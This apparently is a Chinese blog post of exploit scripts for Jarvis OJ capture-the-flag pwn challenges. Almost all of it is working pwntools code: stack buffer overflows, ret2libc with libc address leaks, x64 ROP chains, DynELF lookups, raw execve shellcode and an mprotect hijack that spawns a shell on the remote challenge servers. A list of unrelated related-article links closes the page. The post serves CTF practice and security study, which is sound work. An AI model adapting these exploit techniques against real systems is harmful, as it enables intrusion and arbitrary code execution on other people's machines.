最近做了Jarvis OJ的一部分pwn题,收获颇丰,现在这里简单记录一下exp,分析过程和思路以后再补上

Tell Me Something
此题与level0类似,请参考level0的writeup

http://www.cnblogs.com/WangAoBo/p/7591552.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 elf = ELF('./guestbook')

 good_game_addr = elf.symbols['good_game']

 #  io = process('./guestbook')

 io = remote('pwn.jarvisoj.com', 9876)

 payload = 'A' * 0x88 + p64(good_game_addr)

 io.recvuntil('message:\n')

 io.send(payload)

 print io.recvall()

 io.close()

Smashes

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 flag_addr = 0x400d21

 #  offset = 0x7fffffffcd68 - 0x7fffffffcb50

 #  payload = 'A' * offset + p64(flag_addr)

 payload = p64(flag_addr) * 200

 io = remote('pwn.jarvisoj.com', 9877)

 #  io = process('./smashes')

 io.recvuntil('name? ')

 io.sendline(payload)

 #  io.recvuntil('flag: ')

 io.recv()

 io.sendline()

 io.recv()
Test Your Memory
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./memory')

 win_func_addr = elf.symbols['win_func']

 cat_flag_addr = elf.search('cat flag').next()

 payload = 'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

 #  io = process('./memory')

 io = remote('pwn2.jarvisoj.com', 9876)

 io.recvuntil('> ')

 io.sendline(payload)

 print io.recvall()

 io.close()

[XMAN]level0

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level0')

 callsys_addr = elf.symbols['callsystem']

 #  io = process('./level0')

 io = remote('pwn2.jarvisoj.com', 9881)

 io.recvuntil('World\n')

 payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level1

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 shellcode = asm(shellcraft.i386.linux.sh())

 #  io = process('./level1')

 io = remote('pwn2.jarvisoj.com', 9877)

 text = io.recvline()[14: -2]

 #  print text[14:-2]

 buf_addr = int(text, 16)

 payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 #  io = process('./level2')

 io = remote('pwn2.jarvisoj.com', 9878)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2_x64

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2_x64')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 #  print type(p_rdi_r_addr)

 payload = 'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

 #  io = process('./level2_x64')

 io = remote('pwn2.jarvisoj.com', 9882)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3')

     libc = ELF('/lib/i386-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9879)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u32(io.recv(4))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3_x64

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3_x64')

     libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9883)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3_x64')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0)

 payload += p64(write_elf_addr)

 payload += p64(start_elf_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u64(io.recv(0x8))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(sh_addr)

 payload += p64(sys_addr)

 payload += p64(0xdeadbeef)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level4

 !/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 #  io = process('./level4')

 io = remote('pwn2.jarvisoj.com', 9880)

 elf = ELF('./level4')

 write_elf_addr = elf.symbols['write']

 start_elf_addr = elf.symbols['_start']

 read_elf_addr = elf.symbols['read']

 bss_addr = elf.bss()

 def leak(addr):

     payload = 'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)

     io.send(payload)

     leaked = io.recv(4)

     log.info("leaked -> %s -> 0x%x" % (leaked, u32(leaked)))

     return leaked

 d = DynELF(leak, elf = ELF('./level4'))

 sys_addr = d.lookup('system', 'libc')

 log.info("sys_addr -> 0x%x" % sys_addr)

 payload = 'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)

 io.send(payload)

 io.send('/bin/sh\0')

 sh_addr = bss_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level5

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 def Debug():

     raw_input("waiting for debug:")

     gdb.attach(io, "b *0x0000000000400618")

 from pwn import *

 context.terminal = ['deepin-terminal', '-x', 'bash', '-c']

 context.log_level = 'debug'

 elf = ELF('./level5')

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa

 mov_call = 0x0000000000400690

 local = 0

 if local:

     io = process('./level5')

     libc = ELF('./libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9884)

     libc = ELF('./libc-2.19.so')

 io.recvuntil('Input:\n')

 log.info("Step 1: leak read_addr")

 read_libc_addr = libc.symbols['read']

 read_got_addr = elf.got['read']

 write_elf_addr = elf.symbols['write']

 vuln_elf_addr = elf.symbols['vulnerable_function']

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0000)

 payload += p64(write_elf_addr)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 read_addr = u64(io.recv(8))

 io.recvuntil('Input:\n')

 log.info("leaked read_addr -> 0x%x" % read_addr)

 log.info("Step 2: write shellcode 2 bss")

 sh_addr = bss_addr = elf.bss()

 shellcode = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"

 payload = 'B' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(len(shellcode) + 1)

 payload += p64(bss_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'C' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(shellcode + '\0')

 io.recvuntil('Input:\n')

 log.info("Step 3: hijack mprotect 2 __gmon_start__")

 mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']

 mprotect_hijack_addr = 0x0000000000600a70

 payload = 'D' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'E' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(mprotect_addr))

 io.recvuntil('Input:\n')

 log.info("Step 4: hijack sh/bss 2 __libc_start_main")

 sh_hijack_addr = 0x0000000000600a68

 payload = 'F' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'G' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(sh_addr))

 io.recvuntil('Input:\n')

 log.info("Step 5: fix bss 2 777")

 payload = 'H' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x7)

 #  payload += p64(len(shellcode) + 1)

 #  payload += p64(sh_hijack_addr)

 payload += p64(0x1000)

 payload += p64(0x00600000)

 payload += p64(mov_call)

 payload += 'I' * (7 * 8)

 payload += p64(vuln_elf_addr)

 #  Debug()

 io.send(payload)

 io.recvuntil('Input:\n')

 log.info("Step 6: execv shllcode")

 payload = 'J' * (0x80 + 0x8)

 #  payload += p64(sh_addr)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 log.info("Step 7: getshell")

 io.interactive()

 io.close()

Jarvis OJ - 栈系列部分pwn - Writeup的更多相关文章

  1. Jarvis OJ - 软件密码破解-1 -Writeup

    Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调 ...

  2. Jarvis OJ - [XMAN]level1 - Writeup

    Jarvis OJ - [XMAN]level1 - Writeup M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html 题目: 分 ...

  3. Jarvis OJ - class10 -Writeup

    Jarvis OJ - class10 -Writeup 转载请注明出处:http://www.cnblogs.com/WangAoBo/p/7552266.html 题目: Jarivs OJ的一道 ...

  4. Jarvis OJ - DD-Hello -Writeup

    Jarvis OJ - DD-Hello -Writeup 转载请注明出处http://www.cnblogs.com/WangAoBo/p/7239216.html 题目: 分析: 第一次做这道题时 ...

  5. Jarvis OJ - 爬楼梯 -Writeup

    Jarvis OJ - 爬楼梯 -Writeup 本来是想逆一下算法的,后来在学长的指导下发现可以直接修改关键函数,这个题做完有种四两拨千斤的感觉,记录在这里 转载请标明出处:http://www.c ...

  6. Jarvis OJ - Baby's Crack - Writeup

    Jarvis OJ - Baby's Crack - Writeup M4x原创,欢迎转载,转载请表明出处 这是我第一次用爆破的方法做reverse,值得记录一下 题目: 文件下载 分析: 下载后解压 ...

  7. Jarvis OJ部分逆向

    Jarvis OJ部分逆向题解 很久没有写博客了,前天上Jarvis OJ刷了几道逆向,保持了一下感觉.都是简单题目,写个writeup记录一下. easycrackme int __cdecl ma ...

  8. Jarvis OJ - [XMAN]level3 - Writeup——ret2libc尝试

    这次除了elf程序还附带一个动态链接库 先看一下,很一般的保护 思路分析 在ida中查看,可以确定通过read函数输入buf进行溢出,但是并没有看到合适的目标函数 但是用ida打开附带的链接库,可以看 ...

  9. Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用

    100分的pwn 简单查看一下,果然还是比较简单的 放到ida中查看一下,有明显的溢出函数,并且在函数中打印出了字符串的地址,并且字符串比较长,没有NX保护 所以我们很容易想到构造shellcode, ...

随机推荐

  1. PTA 符号配对 —— C++

    请编写程序检查C语言源程序中下列符号是否配对:/*与 */.(与 ).[与].{与}. 输入格式: 输入为一个C语言源程序.当读到某一行中只有一个句点.和一个回车的时候,标志着输入结束.程序中需要检查 ...

  2. 配置 vim 过程中必须解决的问题

    网络问题 在使用 github 作为插件下载源的时候, 容易出现网络连接超时等错误 在使用 gitee 作为插件下载源的时候, 子模块可能会出现下载超时 解决方案有以下两个: 使用 VPN , 改善访 ...

  3. Mybatis和Hibernate面试问题及答案

    1.@Qualifier 注解 答:当有多个相同类型的bean却只有一个需要自动装配时,将@Qualifier 注解和@Autowire 注解结合使用以消除这种混淆,指定需要装配的确切的bean.   ...

  4. Java-算式填符号

    题目: 某批警察叔叔正在进行智力训练:1 2 3 4 5 6 7 8 9 = 110 请看上边的算式,为了使等式成立,需要在数字间填入加号或者减号(可以不填,但不能填入其它符号).之间没有填入符号的数 ...

  5. .net 基础汇总(1)

    1  转载 String.IsNullOrWhiteSpace和String.IsNullOrEmpty的区别

  6. windows命令提示符常用命令

    1.进入某个磁盘 c:  进入c盘 d: 进入d盘 2.返回到根目录 cd \ 3.查看当钱路径下的文件和文件夹 dir 4.清空窗口内容 cls 5.关闭窗口 exit 6.返回上一级目录 cd . ...

  7. Selenium3+python自动化016-Selenium Grid

    一.Selenium Grid介绍 1.概念 Selenium Grid组件专门用于远程分布式测试或并发测试,通过并发执行测试用例的方式可以提高测试用例的执行速度和效率,解决界面自动化测试执行速度过慢 ...

  8. mui 时间选择器和上传图片

    <!DOCTYPE html><html> <head> <meta charset="UTF-8"> <meta name= ...

  9. vue(一)--监听事件

    1.vue-on:监听事件: demo:点击按钮,number+1 v-on 还可以缩写为 @ 2.事件修饰符 .stop:等同于JavaScript中的event.stopPropagation() ...

  10. 在java中调用mockjs生成模拟数据

    一.手写版 在前端有个模拟数据的神器 Mock.js 能生成随机数据,拦截 Ajax 请求,然后我觉得他的这个生成随机数据不错.然后我就到度娘一顿操作,没找到类似的java实现,于是就有了下面的代码: ...